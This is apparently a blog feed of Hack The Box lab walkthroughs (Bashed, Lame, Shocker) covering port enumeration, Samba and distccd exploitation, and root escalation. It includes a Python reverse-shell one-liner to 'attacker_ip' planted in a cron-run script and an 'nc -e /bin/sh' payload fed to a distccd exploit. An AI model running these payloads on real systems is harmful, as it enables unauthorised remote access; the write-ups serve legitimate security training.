href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw2okiz7lzrgpk27ycbsv.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw2okiz7lzrgpk27ycbsv.jpg" alt="user" width="800" height="137"></a></p> <p>Now let's try to look around to see if we can find any scritps we can ride to <code>root</code> access.</p> <p>Let's change dir to <code>scriptmanager</code> home dir:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>scriptmanager@bashed:<span class="nv">$ </span><span class="nb">cd</span> / <span class="nb">cd</span> / scriptmanager@bashed:/<span class="nv">$ </span><span class="nb">ls ls </span>bin etc lib media proc sbin sys var boot home lib64 mnt root scripts tmp vmlinuz dev initrd.img lost+found opt run srv usr scriptmanager@bashed:/<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span> <span class="nb">ls</span> <span class="nt">-la</span> total 92 drwxr-xr-x 23 root root 4096 Jun 2 2022 <span class="nb">.</span> drwxr-xr-x 23 root root 4096 Jun 2 2022 .. <span class="nt">-rw-------</span> 1 root root 212 Jun 14 2022 .bash_history drwxr-xr-x 2 root root 4096 Jun 2 2022 bin drwxr-xr-x 3 root root 4096 Jun 2 2022 boot drwxr-xr-x 19 root root 4140 Apr 22 03:27 dev drwxr-xr-x 89 root root 4096 Jun 2 2022 etc drwxr-xr-x 4 root root 4096 Dec 4 2017 home lrwxrwxrwx 1 root root 32 Dec 4 2017 initrd.img -&gt; boot/initrd.img-4.4.0-62-generic drwxr-xr-x 19 root root 4096 Dec 4 2017 lib drwxr-xr-x 2 root root 4096 Jun 2 2022 lib64 drwx------ 2 root root 16384 Dec 4 2017 lost+found drwxr-xr-x 4 root root 4096 Dec 4 2017 media drwxr-xr-x 2 root root 4096 Jun 2 2022 mnt drwxr-xr-x 2 root root 4096 Dec 4 2017 opt dr-xr-xr-x 176 root root 0 Apr 22 03:27 proc drwx------ 3 root root 4096 Apr 22 03:28 root drwxr-xr-x 18 root root 520 Apr 22 03:28 run drwxr-xr-x 2 root root 4096 Dec 4 2017 sbin drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 scripts drwxr-xr-x 2 root root 4096 Feb 15 2017 srv dr-xr-xr-x 13 root root 0 Apr 22 03:27 sys drwxrwxrwt 10 root root 4096 Apr 22 04:25 tmp drwxr-xr-x 10 root root 4096 Dec 4 2017 usr drwxr-xr-x 12 root root 4096 Jun 2 2022 var lrwxrwxrwx 1 root root 29 Dec 4 2017 vmlinuz -&gt; boot/vmlinuz-4.4.0-62-generic scriptmanager@bashed:/<span class="nv">$ </span><span class="nb">pwd</span> </code></pre> </div> <p>We found a directory with the name <code>/scripts</code> own by <code>scriptmanager</code> that must be what we are looking for, let's change directory into the <code>/scripts</code> dir:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbrfht6jf9wr7pptjzp8l.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbrfht6jf9wr7pptjzp8l.jpg" alt="scripts" width="800" height="191"></a></p> <p>There are two files in the folder, test.py and test.txt. Let's check the content of test.py first to understand the file.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foq7q33wy7c29kk4cl2kg.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foq7q33wy7c29kk4cl2kg.jpg" alt="shell" width="762" height="187"></a></p> <p>We can see that test.py is a python script which opens test.txt, write a text in the test.txt and close it again and we noticed that test.txt is owned by root, so let's try if we can modify the test.py to get reverse shell, which should give us root access if succesful.</p> <p>Let's try reverse shell code below and replace the content of test.py file<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'import socket,subprocess,os;s=socket.socket();s.connect(("attacker_ip",attacker_port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'</span> <span class="o">&gt;</span> /scripts/test.py </code></pre> </div> <p>Once we update the file, we start an ncat listerner on our local machine and wait. <code>Spray and wait</code>:</p> <p>Yeeeeeeepeee!!!!!! We pop a shell after about a minute, we are root:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F98imiwgngqaqjg3br6yc.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F98imiwgngqaqjg3br6yc.jpg" alt="root" width="800" height="253"></a></p> <h2> Lesson learned </h2> <p>The Bashed machine was a solid reminder that sometimes the simplest oversights like leaving a PHP shell in a web directory or misconfigured script permissions can lead to full system compromise. From light web enumeration to privilege escalation through a writable cron-executed Python script, every stage reinforced real-world penetration testing techniques.</p> <p>Each attempt, including those that didn’t work, played a part in ultimately rooting the box. That’s what makes CTFs like this so valuable they teach patience, observation, and persistence.</p> cybersecurity hacktoberfest tutorial security HTB Lame - NO Metasploit Walkthrough Michael Oladele Mon, 20 Apr 2026 23:16:26 +0000 https://forem.com/micheaol/htb-lame-no-metasploit-walkthrough-1g34 https://forem.com/micheaol/htb-lame-no-metasploit-walkthrough-1g34 <p>In this walkthrough, we’re going to explore two ways to root Lame without metasploit. If you are ready let's dive in.</p> <p>We would start with an nmap scan as usual:</p> <h2> Enumeration </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-p-</span> 10.129.22.59 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-04-20 15:30 CDT Nmap scan report <span class="k">for </span>10.129.22.59 Host is up <span class="o">(</span>0.070s latency<span class="o">)</span><span class="nb">.</span> Not shown: 65530 filtered tcp ports <span class="o">(</span>no-response<span class="o">)</span> PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3632/tcp open distccd </code></pre> </div> <p>I usually check all port first, then check each services individually. We would follow the same flow here.</p> <p>We got ftp, ssh, smb and distccd, let's look into these services one at a time:</p> <h2> 21 - FTP: </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-A</span> <span class="nt">-p21</span> 10.129.22.59 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-04-20 15:34 CDT Nmap scan report <span class="k">for </span>10.129.22.59 Host is up <span class="o">(</span>0.071s latency<span class="o">)</span><span class="nb">.</span> PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed <span class="o">(</span>FTP code 230<span class="o">)</span> | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.15.162 | Logged <span class="k">in </span>as ftp | TYPE: ASCII | No session bandwidth limit | Session <span class="nb">timeout </span><span class="k">in </span>seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.23 <span class="o">(</span>92%<span class="o">)</span>, DD-WRT v24-sp1 <span class="o">(</span>Linux 2.4.36<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Arris TG862G/CT cable modem <span class="o">(</span>90%<span class="o">)</span>, Control4 HC-300 home controller <span class="o">(</span>90%<span class="o">)</span>, D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer <span class="o">(</span>90%<span class="o">)</span>, Dell Integrated Remote Access Controller <span class="o">(</span>iDRAC6<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer <span class="o">(</span>90%<span class="o">)</span>, Linux 2.4.21 - 2.4.31 <span class="o">(</span>likely embedded<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linux 2.4.27 <span class="o">(</span>90%<span class="o">)</span>, Linux 2.4.7 <span class="o">(</span>90%<span class="o">)</span> No exact OS matches <span class="k">for </span>host <span class="o">(</span><span class="nb">test </span>conditions non-ideal<span class="o">)</span><span class="nb">.</span> Network Distance: 2 hops Service Info: OS: Unix TRACEROUTE <span class="o">(</span>using port 21/tcp<span class="o">)</span> HOP RTT ADDRESS 1 70.36 ms 10.10.14.1 2 70.76 ms 10.129.22.59 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span> Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>10.36 seconds </code></pre> </div> <p>From our scan Anonymous FTP login allowed (FTP code 230), this sounds good.</p> <p>Let's try to login, we are able to login but nothing serious in there<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ftp 10.129.22.59 Connected to 10.129.22.59. 220 <span class="o">(</span>vsFTPd 2.3.4<span class="o">)</span> Name <span class="o">(</span>10.129.22.59:root<span class="o">)</span>: anonymous 331 Please specify the password. Password: 230 Login successful. Remote system <span class="nb">type </span>is UNIX. Using binary mode to transfer files. ftp&gt; <span class="nb">ls </span>229 Entering Extended Passive Mode <span class="o">(||</span>|53820|<span class="o">)</span><span class="nb">.</span> 150 Here comes the directory listing. 226 Directory send OK. </code></pre> </div> <p>But when we check the version of the ftp, vsftpd 2.3.4<br> We found out that this version is vulnerable to: <a href="https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/" rel="noopener noreferrer">VSFTPD 2.3.4 Backdoor Command Execution</a>. </p> <p>But because we do not want to use metasploit, let's check other services.</p> <h2> 22 - ssh </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-A</span> <span class="nt">-p22</span> 10.129.22.59 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-04-20 15:39 CDT Nmap scan report <span class="k">for </span>10.129.22.59 Host is up <span class="o">(</span>0.071s latency<span class="o">)</span><span class="nb">.</span> PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 <span class="o">(</span>protocol 2.0<span class="o">)</span> | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd <span class="o">(</span>DSA<span class="o">)</span> |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 <span class="o">(</span>RSA<span class="o">)</span> Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.23 <span class="o">(</span>91%<span class="o">)</span>, DD-WRT v24-sp1 <span class="o">(</span>Linux 2.4.36<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Arris TG862G/CT cable modem <span class="o">(</span>90%<span class="o">)</span>, Dell Integrated Remote Access Controller <span class="o">(</span>iDRAC6<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer <span class="o">(</span>90%<span class="o">)</span>, Linux 2.4.21 - 2.4.31 <span class="o">(</span>likely embedded<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linux 2.4.27 <span class="o">(</span>90%<span class="o">)</span>, Linux 2.4.7 <span class="o">(</span>90%<span class="o">)</span>, Linux 2.6.27 - 2.6.28 <span class="o">(</span>90%<span class="o">)</span>, Linux 2.6.8 - 2.6.30 <span class="o">(</span>90%<span class="o">)</span> No exact OS matches <span class="k">for </span>host <span class="o">(</span><span class="nb">test </span>conditions non-ideal<span class="o">)</span><span class="nb">.</span> Network Distance: 2 hops Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel TRACEROUTE <span class="o">(</span>using port 22/tcp<span class="o">)</span> HOP RTT ADDRESS 1 70.14 ms 10.10.14.1 2 70.53 ms 10.129.22.59 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span> Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>9.82 seconds </code></pre> </div> <p>It seems nothing is in ssh</p> <p>Let's move to smb, for the smb we are going to combine the 339/445</p> <h2> 339/445 - samba </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-A</span> <span class="nt">-p139</span>,445 10.129.22.59 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-04-20 15:42 CDT Nmap scan report <span class="k">for </span>10.129.22.59 Host is up <span class="o">(</span>0.071s latency<span class="o">)</span><span class="nb">.</span> PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Samba smbd 3.X - 4.X <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span> 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span> Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.23 <span class="o">(</span>92%<span class="o">)</span>, Belkin N300 WAP <span class="o">(</span>Linux 2.6.30<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer <span class="o">(</span>90%<span class="o">)</span>, Dell Integrated Remote Access Controller <span class="o">(</span>iDRAC5<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linux 2.4.21 - 2.4.31 <span class="o">(</span>likely embedded<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linux 2.4.7 <span class="o">(</span>90%<span class="o">)</span>, Linux 2.6.18 <span class="o">(</span>ClarkConnect 4.3 Enterprise Edition<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linux 2.6.8 - 2.6.30 <span class="o">(</span>90%<span class="o">)</span>, Dell iDRAC 6 remote access controller <span class="o">(</span>Linux 2.6<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linksys WRV54G WAP <span class="o">(</span>89%<span class="o">)</span> No exact OS matches <span class="k">for </span>host <span class="o">(</span><span class="nb">test </span>conditions non-ideal<span class="o">)</span><span class="nb">.</span> Network Distance: 2 hops Host script results: | smb-os-discovery: | OS: Unix <span class="o">(</span>Samba 3.0.20-Debian<span class="o">)</span> | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System <span class="nb">time</span>: 2026-04-20T16:43:38-04:00 |_clock-skew: mean: 2h00m39s, deviation: 2h49m44s, median: 37s |_smb2-time: Protocol negotiation failed <span class="o">(</span>SMB2<span class="o">)</span> | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled <span class="o">(</span>dangerous, but default<span class="o">)</span> TRACEROUTE <span class="o">(</span>using port 139/tcp<span class="o">)</span> HOP RTT ADDRESS 1 70.41 ms 10.10.14.1 2 70.59 ms 10.129.22.59 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span> Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>55.91 seconds </code></pre> </div> <p>The smb/samba version discovered: smbd 3.0.20-Debian. Let's try to access the shares with smbclient:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>smbclient //10.129.22.59/anonymous Password <span class="k">for</span> <span class="o">[</span>WORKGROUP<span class="se">\i</span>amdayone]: Anonymous login successful tree connect failed: NT_STATUS_BAD_NETWORK_NAME </code></pre> </div> <p>It shows Anonymous login successful, let's try to list the shares:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>smbclient <span class="nt">-L</span> <span class="se">\\\\</span>10.129.22.59<span class="se">\\</span> Password <span class="k">for</span> <span class="o">[</span>WORKGROUP<span class="se">\i</span>amdayone]: Anonymous login successful Sharename Type Comment <span class="nt">---------</span> <span class="nt">----</span> <span class="nt">-------</span> print<span class="nv">$ </span> Disk Printer Drivers tmp Disk oh noes! opt Disk IPC<span class="nv">$ </span> IPC IPC Service <span class="o">(</span>lame server <span class="o">(</span>Samba 3.0.20-Debian<span class="o">))</span> ADMIN<span class="nv">$ </span> IPC IPC Service <span class="o">(</span>lame server <span class="o">(</span>Samba 3.0.20-Debian<span class="o">))</span> Reconnecting with SMB1 <span class="k">for </span>workgroup listing. Anonymous login successful Server Comment <span class="nt">---------</span> <span class="nt">-------</span> Workgroup Master <span class="nt">---------</span> <span class="nt">-------</span> WORKGROUP LAME </code></pre> </div> <p>I was able to list the share, but I was unable to access any of the shares.</p> <p>Now let's check the version on google for any know vulnerability, We found out that the samba version 3.0.20 is vulnerable to: username map script.</p> <p>Remember that we still have one more service left, let's try to enumerate the service also, why not:</p> <h2> 3632 - distccd </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-A</span> <span class="nt">-p3632</span> 10.129.22.59 Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2026-04-20 15:45 CDT Nmap scan report <span class="k">for </span>10.129.22.59 Host is up <span class="o">(</span>0.071s latency<span class="o">)</span><span class="nb">.</span> PORT STATE SERVICE VERSION 3632/tcp open distccd distccd v1 <span class="o">((</span>GNU<span class="o">)</span> 4.2.4 <span class="o">(</span>Ubuntu 4.2.4-1ubuntu4<span class="o">))</span> Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.23 <span class="o">(</span>92%<span class="o">)</span>, Belkin N300 WAP <span class="o">(</span>Linux 2.6.30<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Control4 HC-300 home controller <span class="o">(</span>90%<span class="o">)</span>, Dell Integrated Remote Access Controller <span class="o">(</span>iDRAC5<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Dell Integrated Remote Access Controller <span class="o">(</span>iDRAC6<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer <span class="o">(</span>90%<span class="o">)</span>, Linux 2.4.21 - 2.4.31 <span class="o">(</span>likely embedded<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linux 2.4.7 <span class="o">(</span>90%<span class="o">)</span>, Citrix XenServer 5.5 <span class="o">(</span>Linux 2.6.18<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span>, Linux 2.6.18 <span class="o">(</span>ClarkConnect 4.3 Enterprise Edition<span class="o">)</span> <span class="o">(</span>90%<span class="o">)</span> No exact OS matches <span class="k">for </span>host <span class="o">(</span><span class="nb">test </span>conditions non-ideal<span class="o">)</span><span class="nb">.</span> Network Distance: 2 hops TRACEROUTE <span class="o">(</span>using port 3632/tcp<span class="o">)</span> HOP RTT ADDRESS 1 70.75 ms 10.10.14.1 2 71.01 ms 10.129.22.59 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span> Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>15.90 seconds </code></pre> </div> <p>The service version running is: distccd v1, let's check if this is vulnerable.</p> <p>After some googling, we discovered that this version is vulnerable to: distccd v1 RCE (CVE-2004-2687). Remeber, we do not want to use metasploit.</p> <h2> Exploitation - NO metasploit </h2> <p>Now we are done with service enumeration, let's move on to exploitation, let's keep our focus on samba and distccd, let's go pop shell.</p> <h2> 339/445 - samba: </h2> <p>I do not want to use metasploit, I use the exploit <a href="https://github.com/micheaol/samba-usermap-script.git" rel="noopener noreferrer">here</a></p> <p>With the exploit we got root shell, now need for privilege escalation:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8zfg3g47wq9wr74on049.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8zfg3g47wq9wr74on049.jpg" alt="root shell" width="800" height="243"></a></p> <h2> 3632 - distccd: </h2> <p>After several search, I found this exploit, which wouldn't work: <a href="https://gist.github.com/adityatelange/3c067c7a126b93d2eaba195b65308577" rel="noopener noreferrer">exploit</a></p> <p>I upgraded the exploit code to python3 to see if it would work, <a href="https://github.com/micheaol/distccd_rce_CVE-2004-2687.git" rel="noopener noreferrer">upgraded exploit here</a></p> <p>Once you have exploit ready, start ncat listerner on your local machine:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc <span class="nt">-lvnp</span> attacker_port </code></pre> </div> <p>Then run the exploit with the command below:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 exploit.py <span class="nt">-t</span> target_ip <span class="nt">-p</span> target_port <span class="nt">-c</span> <span class="s2">"nc attacker_ip attacker_port -e /bin/sh"</span> </code></pre> </div> <p>I pop a shell:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58cv6m14bpnph578hl3s.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58cv6m14bpnph578hl3s.jpg" alt="shell" width="800" height="577"></a></p> <p>If you noticed, with this shell, unlike the samba shell, we are not root. Therefore, we need to escalate our privilege.</p> <h2> Privilege Escalation </h2> <p>First, let's check SUID to see if there are binaries we can ride on to become root:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>find / <span class="nt">-perm</span> <span class="nt">-u</span><span class="o">=</span>s <span class="nt">-type</span> f 2&gt;/dev/null find / <span class="nt">-perm</span> <span class="nt">-u</span><span class="o">=</span>s <span class="nt">-type</span> f 2&gt;/dev/null /bin/umount /bin/fusermount /bin/su /bin/mount /bin/ping /bin/ping6 /sbin/mount.nfs /lib/dhcp3-client/call-dhclient-script /usr/bin/sudoedit /usr/bin/X /usr/bin/netkit-rsh /usr/bin/gpasswd /usr/bin/traceroute6.iputils /usr/bin/sudo /usr/bin/netkit-rlogin /usr/bin/arping /usr/bin/at /usr/bin/newgrp /usr/bin/chfn /usr/bin/nmap /usr/bin/chsh /usr/bin/netkit-rcp /usr/bin/passwd /usr/bin/mtr /usr/sbin/uuidd /usr/sbin/pppd /usr/lib/telnetlogin /usr/lib/apache2/suexec /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/pt_chown /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper </code></pre> </div> <p>From output above <code>/usr/bin/nmap</code> looks juicy. Let's check GTFBINS:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7slo6s7ta54se3kcifhv.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7slo6s7ta54se3kcifhv.jpg" alt="GTFBINS" width="800" height="170"></a></p> <p>We found nmap and command to run on GTFBINs, what are we waiting for? Let's run the command:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxz8n88mbnrl6doz4e51m.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxz8n88mbnrl6doz4e51m.jpg" alt="shell" width="800" height="276"></a></p> <p>We are root!</p> <h3> Lessons Learned </h3> <p>This machine reinforced the importance of approaching exploitation from multiple angles. While <code>distccd (CVE-2004-2687)</code> provided a straightforward remote code execution path, exploring the Samba service revealed an alternative route to compromise. This highlights that real-world targets often have more than one viable attack vector.</p> <p>Avoiding automated tools like Metasploit forced a deeper understanding of the underlying vulnerabilities. Rewriting the exploits improved my ability to analyze exploit logic, adapt payloads, and troubleshoot issues when things didn’t work as expected.</p> <p>Another key takeaway is the critical role of thorough enumeration. Identifying outdated and vulnerable services early on made exploitation significantly easier. This emphasizes that enumeration is often the most important phase of a penetration test.</p> <p>Finally, this machine demonstrates how legacy services such as distccd and Samba can pose serious security risks when left unpatched, reinforcing the importance of proper system hardening and regular updates.</p> cybersecurity linux security tutorial Hack The Box: Shocker Machine Writeup Michael Oladele Thu, 09 Apr 2026 16:43:11 +0000 https://forem.com/micheaol/hack-the-box-shocker-machine-writeup-1m5o https://forem.com/micheaol/hack-the-box-shocker-machine-writeup-1m5o <h2> 🚀Introduction </h2> <p>The Shocker machine on Hack The Box is an excellent tool to learn and exploit the Shellshock vulnerability. In this walkthrough, we will enumerate this retired machine step by step and capture the user and root flags, demonstrating a real-world example of this catastrophic exploit.</p> <h2> 🔍 Enumeration </h2> <p>First, we begin by scanning for open ports on the target machine.</p> <p>I kinda like to first scan the all the ports first, then dive deeper like below:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjt7oopb8q63j4wgvy0pw.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjt7oopb8q63j4wgvy0pw.jpg" alt="nmap-scan" width="800" height="293"></a></p> <p>Two ports came back as open:</p> <ul> <li>Port 80 — HTTP (Apache web server)</li> <li>Port 2222 — SSH</li> </ul> <p>Since web servers usually have more attack surface, let's focus on port 80 to check if we get foothold.</p> <p>The next step would be for us to perform a version and service detection scan:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Favj7n96ucgtlnl5ci03y.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Favj7n96ucgtlnl5ci03y.jpg" alt="nmap-service-scan" width="800" height="583"></a></p> <p>Let's do banner grabbing to be sure the server we got from nmap is correct: <br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6deh44oc48j6tlztn96h.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6deh44oc48j6tlztn96h.jpg" alt="banner-grabbing" width="800" height="255"></a></p> <p>We can confidently say:<br> The server is running: <strong>Apache/2.4.18 on port 80 (Ubuntu)</strong></p> <p>Since port 80 is running a public-facing Apache web server, it offers a good opportunity for us to see what is running. Let's navigate to <a href="http://ip" rel="noopener noreferrer">http://ip</a>. Then we see:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2azn73w7fb20vkv2k1m2.jpg" class="article-body-image-wrapper"><img 